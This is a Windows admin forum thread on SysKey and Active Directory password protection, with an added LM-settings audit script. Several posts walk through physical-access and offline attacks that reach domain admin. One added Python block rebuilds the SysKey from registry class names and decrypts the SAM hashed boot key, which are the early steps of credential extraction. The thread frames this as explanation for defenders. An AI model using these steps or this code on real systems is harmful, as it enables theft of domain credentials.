SysKey


faels

We want to use SysKey on our AD domain controller. Before
implementing the change, I wanted to know if there are any known
issues with using the utility. We are not going to pick either of the
advanced options, and will keep the key locally on the machine.

Has anyone experienced problems after using the utility in a Windows
Server 2003 domain environment? Are there any issues with legacy
systems accessing this information? What level of encryption does a
SysKey protected environment maintain?

Any input would be helpful
 
Syskey as you describe it is already enabled on W2K and W2003 computers, so you do
not have to do anything. If you run Syskey on your computer you should already see
"encryption enabled". If you enable floppy or password access, then the operating
system cannot be started until the floppy or password is entered, which may be a
problem if the domain computer reboots itself and no one is around. The domain
controller should be physically secured to some degree already to prevent any
unauthorized access to it. Syskey as enabled by default can make it extremely
difficult for someone to crack the local SAM account by trying to access it from
outside of the operating system, such as putting the hard drive in another computer or
using a parallel install to access it and then trying to use a password cracker like LC4
against it. --- Steve

http://support.microsoft.com/default.aspx?scid=kb;en-us;310105
 
The Domain Controllers store passwords in Active Directory, not the SAM
database. SysKey would have no impact on accounts stored in the directory.
 
Thanks for all of your feedback. What is the encryption level for
items, passwords specifically, stored in Windows 2000/2003 Active
Directory databases? If SysKey is already enabled, it should be
128-bit, right?

We have a client that is inquiring, and we are curious ourselves.

Thanks again.
 
Syskey does use 128-bit strength, though there was a vulnerability that at one
time required a patch. The two links below give more details.

http://www.microsoft.com/technet/security/news/efs.mspx
http://www.microsoft.com/technet/security/bulletin/fq99-056.mspx

I don't know the mechanics of the AD database other than that it is stored in ntds.dit
and is much more secure than the SAM was. I do not know of any tool available that
can crack the ntds.dit database offline, including LC5, and I spent about ten
minutes looking on Google. However, that does not mean there is not a way now or
in the future, and physical security of domain controllers and backup media is
important. There are much easier ways to compromise any domain, including social
engineering, keyboard loggers, cameras, etc. It would make sense to disable
storing of LM hashes on domain controllers if possible and to configure downlevel
domain clients such as W9X to use NTLMv2 authentication by using the Directory
Services Client/modifying the registry, and to configure Domain and Domain
Controller Security Policy for LAN Manager authentication level to be at least
"send NTLMv2 responses only". That will reduce the risk of using LM
authentication over the network, which can be easily sniffed and cracked. It is
much more difficult to crack NTLMv2 or Kerberos hashes sniffed off the wire.
By default Kerberos will be used between W2000/XP Pro/W2003 computers in an AD
domain, though fallback to NTLM/NTLMv2 will be used if necessary, such as when an
IP address is used to locate a domain resource instead of a name or the time skew
is greater than five minutes between domain computers. --- Steve

http://support.microsoft.com/default.aspx?scid=KB;EN-US;q299656& -- may not
work if W9X computers are used to log on to the domain.
http://support.microsoft.com/default.aspx?scid=kb;en-us;239869
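The two settings Steve's post recommends (NoLMHash and the LAN Manager authentication level) both live as REG_DWORD values under HKLM\SYSTEM\CurrentControlSet\Control\Lsa on XP/2003, so they can be audited from the text `reg query` prints. The following is an added example, not code from the thread or from Microsoft: it parses constructed `reg query` output and reports whether the machine meets the "send NTLMv2 responses only" bar. Assumptions: an absent value is treated as the weakest setting (the real OS default differs by version), and the Windows 2000 variant, where NoLMHash is a registry key rather than a value (KB 299656), is not handled.

```python
"""
Audit NoLMHash and LmCompatibilityLevel from `reg query` text.
Added example for this thread; the sample output below is constructed.
"""
import re
from typing import Dict, List

LSA_PATH = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

# Meaning of each LmCompatibilityLevel value ("LAN Manager authentication level").
LM_LEVELS = {
    0: "Send LM & NTLM responses",
    1: "Send LM & NTLM; use NTLMv2 session security if negotiated",
    2: "Send NTLM response only",
    3: "Send NTLMv2 response only",
    4: "Send NTLMv2 response only, refuse LM",
    5: "Send NTLMv2 response only, refuse LM & NTLM",
}
MIN_ACCEPTABLE_LEVEL = 3  # "send NTLMv2 responses only", as the post recommends

# One `reg query` value line:  <name>  <REG_type>  <data>
_VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(\S.*?)\s*$")


def parse_reg_query(output: str) -> Dict[str, int]:
    """Collect the REG_DWORD values from `reg query <key>` output as {name: int}."""
    values: Dict[str, int] = {}
    for line in output.splitlines():
        m = _VALUE_RE.match(line)
        if not m or m.group(2) != "REG_DWORD":
            continue  # header line, blank line, or a non-DWORD value
        name, _, raw = m.groups()
        values[name] = int(raw, 16) if raw.lower().startswith("0x") else int(raw)
    return values


def assess_lsa(values: Dict[str, int]) -> Dict[str, object]:
    """Compare the parsed values with the thresholds argued for above."""
    # Assumption: a missing value is scored as the weakest setting (conservative audit).
    level = values.get("LmCompatibilityLevel", 0)
    nolm = values.get("NoLMHash", 0)
    findings: List[str] = []
    if nolm != 1:
        findings.append("NoLMHash is not 1: LM hashes of newly set passwords are stored")
    if level < MIN_ACCEPTABLE_LEVEL:
        findings.append(
            f"LmCompatibilityLevel={level} ({LM_LEVELS.get(level, 'unknown')}): "
            "LM responses can still be sent on the wire")
    return {
        "lm_level": level,
        "lm_level_meaning": LM_LEVELS.get(level, "unknown"),
        "nolmhash": nolm,
        "findings": findings,
        "ok": not findings,
    }


# Constructed samples of `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa` output.
SAMPLE_WEAK = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Bounds    REG_BINARY    0030000000200000
    LmCompatibilityLevel    REG_DWORD    0x0
    NoLMHash    REG_DWORD    0x0
"""

SAMPLE_HARDENED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Bounds    REG_BINARY    0030000000200000
    LmCompatibilityLevel    REG_DWORD    0x3
    NoLMHash    REG_DWORD    0x1
"""


if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        result = assess_lsa(parse_reg_query(sample))
        print(label, "OK" if result["ok"] else "FINDINGS", result["findings"])
```

On a real host, feed it `reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa"` output captured to a file. Setting NoLMHash only stops LM hashes being stored for passwords changed after the setting is applied, so existing accounts keep their LM hash until the next password change.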
 
-----Original Message-----
The Domain Controllers store passwords in Active Directory, not the SAM
database. SysKey would have no impact on accounts stored
in the directory.

Not so.

Hashed representations of passwords stored in either the
SAM or Active Directory (ntds.dit) are both encrypted with
SYSKEY by default on Win2k and Win2k3.

http://mhorder.com/securityfocus/pdf/hackingwindows/CH02.PDF
http://www.microsoft.com/technet/Security/prodtech/win2003/w2003hg/sgch04.mspx
 
Not to mention that if I get physical access to a domain controller that is not
protected with syskey other than default level, I can be domain administrator within
ten minutes by first resetting the administrator password for the built in local
administrator account used for Recovery Console and Directory Services Restore Mode,
and then logging in via DSRM, doing a registry mod to reset the desktop settings so
that the screen saver kicks in a few seconds after boot up to show the command
console and then use dsa.msc to bring up AD Users and Groups and I am in as domain
administrator. I recently tested this and it still works on SP4. --- Steve

http://www.petri.co.il/reset_domain_admin_password_in_windows_2000_ad.htm

 
And not to mention that, for the default level, in an offline attack
the bad guys

1) obtain the syskey,
2) decrypt the SAM hive, or decrypt ntds.dit's "unicodePwd" or
"dBCSPwd" values, and
3) pass the decrypted hashes back to the online SAM or DC for
Local Admin or Domain Admin, respectively.

http://studenti.unina.it/~ncuomo/syskey/

WinPE or BartPE allow a similar attack here by installing
the SRVANY service offline.
http://www.nobodix.org/seb/win2003_adminpass.html

Also there is a Microsoft webcast about this password
theft today.

TechNet Webcast: Passwords Demystified - Level 200
6/25/2004 1:00 PM
http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032253148&Culture=en-US



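Step 1 of the offline attack above is possible in the default SysKey mode precisely because the key is stored on disk: it is scattered across the class names of four subkeys under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (JD, Skew1, GBG, Data) and de-scrambled with a fixed permutation. The SAM's F value then yields the "hashed boot key" that encrypts the per-user hashes, with an MD5 checksum that only verifies if the right SysKey was supplied, which is why the floppy and password modes defeat this step. The block below is an added example written for this thread, not code from the linked analysis or from any of the tools named in it: it reproduces those two derivations from the published SAM/SysKey layout using only the standard library. The class names and SAM data are a constructed fixture (a real hive would be parsed with an offline registry reader), and the per-user DES step is left out because the standard library has no DES.

```python
"""
Offline derivation of the SysKey ("boot key") and the SAM "hashed boot key".
Added example; the hive data used here is constructed, not from a real system.
"""
import hashlib
from typing import List

# The boot key is spread over the *class names* (not values) of these four keys
# under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, in this order.
LSA_KEYS = ("JD", "Skew1", "GBG", "Data")

# After hex-decoding and concatenating the four class names, the 16 bytes are
# de-scrambled with this fixed permutation.
PERMUTATION = [0x8, 0x5, 0x4, 0x2, 0xB, 0x9, 0xD, 0x3,
               0x0, 0x6, 0x1, 0xC, 0xE, 0xA, 0xF, 0x7]

# Fixed salts Windows mixes into the SAM key derivation.
AQWERTY = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
ANUM = b"0123456789012345678901234567890123456789\0"


def rc4(key: bytes, data: bytes) -> bytes:
    """Minimal RC4; only here because the SAM format uses it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def bootkey_from_class_names(class_names: List[str]) -> bytes:
    """Step 1: rebuild the 16-byte SysKey from the JD/Skew1/GBG/Data class names."""
    if len(class_names) != len(LSA_KEYS):
        raise ValueError("expected the class names of JD, Skew1, GBG and Data")
    scrambled = b"".join(bytes.fromhex(c) for c in class_names)
    if len(scrambled) != 16:
        raise ValueError("each class name must be 8 hex digits")
    return bytes(scrambled[PERMUTATION[i]] for i in range(16))


def hashed_bootkey_from_sam_f(f_value: bytes, bootkey: bytes) -> bytes:
    """Step 2 (first half): derive the key that encrypts the per-user hashes from
    SAM\\Domains\\Account\\F and the SysKey, verifying the embedded checksum.
    The checksum fails when the SysKey is not the one this SAM was sealed with,
    which is what happens in floppy or password mode: the key is not on disk."""
    salt = f_value[0x70:0x80]
    rc4_key = hashlib.md5(salt + AQWERTY + bootkey + ANUM).digest()
    hashed = rc4(rc4_key, f_value[0x80:0xA0])
    checksum = hashlib.md5(hashed[:16] + ANUM + hashed[:16] + AQWERTY).digest()
    if checksum != hashed[16:]:
        raise ValueError("hashed boot key checksum failed: wrong SysKey "
                         "(wrong SYSTEM hive, or floppy/password mode in use)")
    return hashed[:16]


def syskey_unlocks_sam(f_value: bytes, bootkey: bytes) -> bool:
    """True when this SysKey seals this SAM (the checksum verifies)."""
    try:
        hashed_bootkey_from_sam_f(f_value, bootkey)
        return True
    except ValueError:
        return False


def build_sam_f_fixture(bootkey: bytes, hashed_bootkey: bytes) -> bytes:
    """Constructed test data: the inverse of hashed_bootkey_from_sam_f, so the
    example runs offline. Only the 0x70..0xA0 region of F is populated."""
    salt = bytes(range(0x10))  # arbitrary 16-byte salt at offset 0x70
    checksum = hashlib.md5(hashed_bootkey + ANUM + hashed_bootkey + AQWERTY).digest()
    rc4_key = hashlib.md5(salt + AQWERTY + bootkey + ANUM).digest()
    return b"\0" * 0x70 + salt + rc4(rc4_key, hashed_bootkey + checksum)


# Constructed fixture standing in for what an offline hive reader would return.
FIXTURE_CLASS_NAMES = ["0123abcd", "ef456789", "0a1b2c3d", "4e5f6071"]
FIXTURE_HASHED_BOOTKEY = bytes.fromhex("00112233445566778899aabbccddeeff")


def demo() -> bytes:
    """Run both derivations over the fixture and return the recovered key."""
    bootkey = bootkey_from_class_names(FIXTURE_CLASS_NAMES)
    f_value = build_sam_f_fixture(bootkey, FIXTURE_HASHED_BOOTKEY)
    return hashed_bootkey_from_sam_f(f_value, bootkey)


if __name__ == "__main__":
    print("SysKey:         ", bootkey_from_class_names(FIXTURE_CLASS_NAMES).hex())
    print("hashed boot key:", demo().hex())
```

The point for the original question: with the key kept locally (the default and the mode the thread starter intends), anyone holding copies of the SYSTEM and SAM hives has everything `bootkey_from_class_names` needs, so SysKey in that mode raises the bar for offline cracking without removing the need for physical control of the domain controller and its backup media.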
 